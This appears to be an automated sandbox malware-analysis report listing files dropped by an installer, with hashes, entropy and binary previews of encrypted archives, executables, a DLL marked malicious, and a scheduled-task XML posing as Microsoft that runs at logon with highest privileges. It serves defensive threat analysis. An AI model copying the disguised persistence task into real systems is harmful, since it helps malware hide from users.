                                                                                                              Preview:7z..'.............2.......f.n.&...(..I.\=9.).r...;...}...qgY..U..p..a..".M~4.z.....y.^L....BN.DD.E.........j.$...j..DI...........rN..q.5W}.T./...+Vk...{..Z..C...3.E..[.Ikce...>...jk4....M..m.R!..y..~....E..L...'.w....C...}vM!|.'4..3HmL..99*.a.`.HH..1Y^U_l.V.4..Ct...l....j.g@'.....5.._]......}...k....N.i9v.9ydGWW....}ze:H.$...l.Y..4'$.Z...OOUD.q.y..(.....h.>..tDB..m......E...w...iH....L...U.$Q.j.a..-..riE.F..~.Uy.F.F.i.....)..F2..@<................<...Fxpx..Z._..U..8y.+.....6E.O.R7.\...`..?....-.ti...].-.2.)T...K....!...t.........21.;.(...PP...N.Q...9...%.G.....;\S.M.m9_..2B....=."..4......dsP.g'..).w...-xdJG..K...-.A.g....Ug../......x.:....Y.R:t..G1.x.o..K.?k..l.%;.|\..#[...]...o.&.v...s.1.E.o.._i..Z?..j7&Pq. .q............4.x...5`./N...y..S..y.._~..._T.|t.(..g..a.E.p........p..jc....G.tj.....?..U....<}.v*.6...Y..cc.......Ay...Mr..YP.C..L.J....?..Xf.V./l.....!NDU8.?./..,I;#]!yqZ_-....9{X...#.\...<..!...0..n..n.*....p.5.y.Z..}.=.p.7.NH..E.G...*N.
                                                                                                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):56546
                                                                                                              Entropy (8bit):7.996966859255975
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                                                                                              MD5:CEA69F993E1CE0FB945A98BF37A66546
                                                                                                              SHA1:7114365265F041DA904574D1F5876544506F89BA
                                                                                                              SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                                                                                              SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                                                                                              Malicious:false
                                                                                                              Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:7-zip archive data, version 0.4
                                                                                                              Category:dropped
                                                                                                              Size (bytes):56546
                                                                                                              Entropy (8bit):7.996966859255979
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                                                                                              MD5:4CB8B7E557C80FC7B014133AB834A042
                                                                                                              SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                                                                                              SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                                                                                              SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                                                                                              Malicious:false
                                                                                                              Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                                                                                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):31890
                                                                                                              Entropy (8bit):7.99402458740637
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                                                                                              MD5:8622FC7228777F64A47BD6C61478ADD9
                                                                                                              SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                                                                                              SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                                                                                              SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                                                                                              Malicious:false
                                                                                                              Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:7-zip archive data, version 0.4
                                                                                                              Category:dropped
                                                                                                              Size (bytes):31890
                                                                                                              Entropy (8bit):7.99402458740637
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                                                                                              MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                                                                                              SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                                                                                              SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                                                                                              SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                                                                                              Malicious:false
                                                                                                              Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                                                                                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):74960
                                                                                                              Entropy (8bit):7.99759370165655
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                                                                                              MD5:950338D50B95A25F494EE74E97B7B7A9
                                                                                                              SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                                                                                              SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                                                                                              SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                                                                                              Malicious:false
                                                                                                              Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:7-zip archive data, version 0.4
                                                                                                              Category:dropped
                                                                                                              Size (bytes):74960
                                                                                                              Entropy (8bit):7.997593701656546
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                                                                                              MD5:059BA7C31F3E227356CA5F29E4AA2508
                                                                                                              SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                                                                                              SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                                                                                              SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                                                                                              Malicious:false
                                                                                                              Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                                                                                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):29730
                                                                                                              Entropy (8bit):7.994290657653607
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                                                                                              MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                                                                                              SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                                                                                              SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                                                                                              SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                                                                                              Malicious:false
                                                                                                              Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:7-zip archive data, version 0.4
                                                                                                              Category:modified
                                                                                                              Size (bytes):29730
                                                                                                              Entropy (8bit):7.994290657653608
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                                                                                              MD5:A9C8A3E00692F79E1BA9693003F85D18
                                                                                                              SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                                                                                              SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                                                                                              SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                                                                                              Malicious:false
                                                                                                              Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:7-zip archive data, version 0.4
                                                                                                              Category:dropped
                                                                                                              Size (bytes):249984
                                                                                                              Entropy (8bit):7.99927430870047
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:6144:5ca7IDBMN0AXMgKXYYoAGThkbN0lJyx7cLoHAd0cWkkoUEXU2bO:Z7IDC9mb1+WN0Dyhwh0cWloUP2bO
                                                                                                              MD5:D129E17A30F3E99E49E639655EB5DEB2
                                                                                                              SHA1:302C332A978CB967E95F2B54A713BD1D2F72A131
                                                                                                              SHA-256:BE38AB40C78A620589239D5111CD51FFF82D4930C7CB296F579936ADFD2AB05A
                                                                                                              SHA-512:39A5F12F479357D0FC8EE5CC23EB1030C152C2FCB673B2FA7675D6C2BE9B5F3C0B2221825CF7BBF551E48D9957ECA21B43394B24812EEEDD8DAB3204DCE79341
                                                                                                              Malicious:false
                                                                                                              Preview:7z..'......z .......@...........B..(-L"3sS..#..U\..C.]ECa .u%.\.../3a.....=.uK......fO?E..\B.?.2.g.....\d.^(;F$F.....g...{.....nb.~1.....6.,...E.-.b...$Gz/..Qe.......}..a.yI.Nfl......<.\.. ....1.'>..Ex......g.|{......d.@.r...l....w...=k`.`.Mur....k...&".H*......FJ........-R2...:.2V....g7...:"*N..O8..q.9z.9.G..z..>.H....@.;........Hb..}.....{.T.I.s......,......p.B....P.+..j.W."JO.-J..Z ...Vh...%..L.r."z..@tb.(gi....h2...R.X....F.x.cG.....%JaU,.$...d.....".i..|...<..v...>....hf.#.8.. (.3$.x.....l..l..h|%7.S..i.L#L..P.d7Gr...{./.r.o...k.....9..S[...}.KbH.y..\.Qq.uo.O.+Z.Z......G....=@a.*@.M.r......sR...^....d..w.oM&d..&N..?.L`h.`J.~,>.;....)A@..(.......k..T.A9.{V4.......0,.0..<...2.}:..cF.....Q.K\ 6w.....>.+1.#k.P.`.+.d.?.S...{.[........`4.D...R..xo..z...<[.A.w.C.=?..&.!..O.......u4.b...o6..x....J.../...W...t...>i...AN.`..Us>k..y30j..v.......2R.T...6Q.0. V.v.}..l.._...?..b.l..|;..jf....0.......dR.`._....j.i...'.'.....Iy.3S.q.'k.@....o......
                                                                                                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                                                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):63640
                                                                                                              Entropy (8bit):6.482810107683822
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                                                                                              MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                                                                                              SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                                                                                              SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                                                                                              SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 9%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4096
                                                                                                              Entropy (8bit):3.3559826956858623
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:dXKLzDlnnL6w0QldOVQOj933ODOiTdKbKsz72eW+5y9:dXazDlnWwhldOVQOj6dKbKsz7
                                                                                                              MD5:A94F9E54EA11556400441692EB6F0CA5
                                                                                                              SHA1:A73C35EA81ADA95CB0710741B4895EF701F164DD
                                                                                                              SHA-256:7550ACACE86423FBE52531E41556ED2D487FA2E6A97E05A0AA36F65A01559123
                                                                                                              SHA-512:63FA0A6DC34650E7B52EC9C664B665D499803485C12C8C9BF33C2DC909B2C1C4D933D32068EC00881E34A83C8E3BFE598217694728914DB814957C7A603565F5
                                                                                                              Malicious:false
                                                                                                              Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNet
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):5649408
                                                                                                              Entropy (8bit):6.392614480390128
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                                                                                              MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                                                                                              SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                                                                                              SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                                                                                              SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3584000
                                                                                                              Entropy (8bit):7.00283805408099
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                                                                                                              MD5:4DB75814BF4A212D3AEBA5831C059402
                                                                                                              SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                                                                                                              SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                                                                                                              SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 13%
                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):64
                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                              MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                              SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                              SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                              SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                              Malicious:false
                                                                                                              Preview:@...e................................................@..........
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
